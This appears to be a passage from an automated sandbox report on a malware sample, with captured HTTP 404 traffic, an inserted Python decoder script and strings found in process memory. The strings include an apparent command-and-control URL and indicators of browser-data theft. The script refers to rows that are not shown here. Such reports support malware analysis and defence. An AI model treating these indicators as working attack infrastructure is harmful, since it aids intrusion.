72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 17 Nov 2024 07:37:14 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 
20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 17 Nov 2024 07:37:17 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 
20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 17 Nov 2024 07:37:19 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 
20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 17 Nov 2024 07:37:26 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 17 Nov 2024 07:37:28 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 17 Nov 2024 07:37:31 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 17 Nov 2024 07:37:33 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
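The rows above record each 404 response as a status line and headers run together, followed by a hex dump of the body; the LiteSpeed bodies are additionally chunked, gzip-compressed and cut off mid-byte by the report, so nothing in them is readable as printed. The script below is an added example, not code from the Joe Sandbox report: it turns such a row back into a status line, a header dictionary and the decoded body, and it tolerates every truncation the rows above exhibit (a lone trailing hex digit, a chunk shorter than its declared size, fewer bytes than Content-Length, a gzip stream missing its trailer). The header-name list it splits on is taken from the rows above and is the script's own assumption; the two rows in SAMPLE_ROWS are constructed to mirror the Apache and LiteSpeed responses, not copied from the report.

```python
"""Decode the 'Data Raw' payloads in Joe Sandbox 'HTTP traffic detected' rows.
Added example, not code from the report; SAMPLE_ROWS are constructed here to
mirror the Apache and LiteSpeed rows above."""
import gzip
import re
import zlib

# Header names seen in the rows above. The report prints the status line and
# the headers with no separator, so the text is cut in front of each known name.
KNOWN_HEADERS = ("keep-alive", "content-type", "transfer-encoding",
                 "content-encoding", "vary", "date", "server",
                 "x-turbo-charged-by", "connection", "content-length",
                 "x-powered-by", "x-frame-options")
HEADER_CUT = re.compile(
    "(?i)(?=(?:" + "|".join(re.escape(h) for h in KNOWN_HEADERS) + "):)")
ROW = re.compile(r"HTTP traffic detected:\s*(?P<head>.*?)Data Raw:\s*"
                 r"(?P<hex>.*?)(?:\s*\|?\s*Data Ascii:|$)", re.S)

def hex_to_bytes(hexdump):
    """'3c 21 44 ...' -> bytes. The report cuts long bodies mid-byte (rows above
    end in '... 4b d'): a lone final digit is dropped and reported as truncation."""
    tokens = hexdump.split()
    truncated = bool(tokens) and len(tokens[-1]) == 1
    if truncated:
        tokens.pop()
    return bytes.fromhex("".join(tokens)), truncated

def dechunk(data):
    """Undo HTTP chunked framing; tolerate a dump that stops inside a chunk."""
    out, pos = bytearray(), 0
    while True:
        eol = data.find(b"\r\n", pos)
        field = data[pos:eol].split(b";")[0].strip() if eol >= 0 else b""
        if not re.fullmatch(rb"[0-9a-fA-F]+", field):
            return bytes(out), True          # size line missing or garbled
        size = int(field, 16)
        if size == 0:
            return bytes(out), False         # terminating chunk present
        chunk = data[eol + 2:eol + 2 + size]
        out += chunk
        if len(chunk) < size:
            return bytes(out), True          # chunk body cut short
        pos = eol + 2 + size + 2             # skip the chunk's trailing CRLF

def gunzip_lenient(data):
    """Inflate a gzip member; a stream cut before its trailer still yields
    everything that inflated (zlib.error is raised only for corrupt data)."""
    return zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(data)

def decode_row(row):
    """Parse one report row into status line, headers and decoded body."""
    m = ROW.search(row)
    if not m:
        raise ValueError("not an 'HTTP traffic detected' row")
    parts = [p.strip(" |") for p in HEADER_CUT.split(m.group("head"))]
    parts = [p for p in parts if p]
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(":")
        headers[name.strip().lower()] = value.strip()
    body, truncated = hex_to_bytes(m.group("hex"))
    if "chunked" in headers.get("transfer-encoding", "").lower():
        body, cut = dechunk(body)
        truncated = truncated or cut
    if headers.get("content-encoding", "").lower() == "gzip":
        body = gunzip_lenient(body)
    elif "content-length" in headers:
        truncated = truncated or len(body) < int(headers["content-length"])
    return {"status": parts[0], "headers": headers, "body": body,
            "truncated": truncated}

def make_row(head, body):
    # Constructed row in the report's layout, hex-encoding the body as it does.
    return "Source: global trafficHTTP traffic detected: %sData Raw: %s" % (
        head, " ".join("%02x" % b for b in body))

APACHE_BODY = (b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n'
               b"<title>404 Not Found</title>\n</head><body>\n"
               b"<h1>Not Found</h1>\n</body></html>\n")
LITESPEED_HTML = (b"\n\n\n<!DOCTYPE html>\n<html>\n<head>\n<title>404 Not Found"
                  b"</title>\n" + b"<style>body{margin:0}</style>\n" * 20
                  + b"</head><body></body></html>\n")
_GZ = gzip.compress(LITESPEED_HTML)
_FRAMED = b"%x\r\n%s\r\n0\r\n\r\n" % (len(_GZ), _GZ)   # one chunk plus terminator
SAMPLE_ROWS = {
    "apache": make_row("HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:37:26 GMT"
                       "Server: ApacheContent-Length: %dConnection: close"
                       "Content-Type: text/html; charset=iso-8859-1"
                       % len(APACHE_BODY), APACHE_BODY),
    # Drop the chunk terminator and gzip trailer (15 bytes) and leave a lone
    # trailing digit, which is how the report cuts the LiteSpeed bodies above.
    "litespeed": make_row("HTTP/1.1 404 Not Foundcontent-type: text/html"
                          "transfer-encoding: chunkedcontent-encoding: gzip"
                          "server: LiteSpeedconnection: close",
                          _FRAMED[:-15]) + " d",
}

if __name__ == "__main__":
    for name, row in SAMPLE_ROWS.items():
        r = decode_row(row)
        print(name, r["status"], r["headers"].get("server"),
              "truncated" if r["truncated"] else "complete", r["body"][:40])
```

Feed decode_row the complete text of a "Source: global traffic ... Data Raw: ..." row. Where the report spills a long hex dump onto a separate continuation line (the lines beginning "c7 fb 40 5d ..." above), join that continuation onto its row first; the decoder then inflates as much of the gzip stream as the dump contains and reports truncated=True rather than failing.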
            Source: wextract.exe, 0000000D.00000002.4141477691.000000000569C000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.000000000395C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
            Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
            Source: rQkTBkrqhGpTBn.exe, 0000000E.00000002.4142164546.00000000053F1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.booosted.xyz
            Source: rQkTBkrqhGpTBn.exe, 0000000E.00000002.4142164546.00000000053F1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.booosted.xyz/ndw1/
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: wextract.exe, 0000000D.00000002.4141477691.00000000051E6000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.00000000034A6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://domaincntrol.com/?orighost=
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
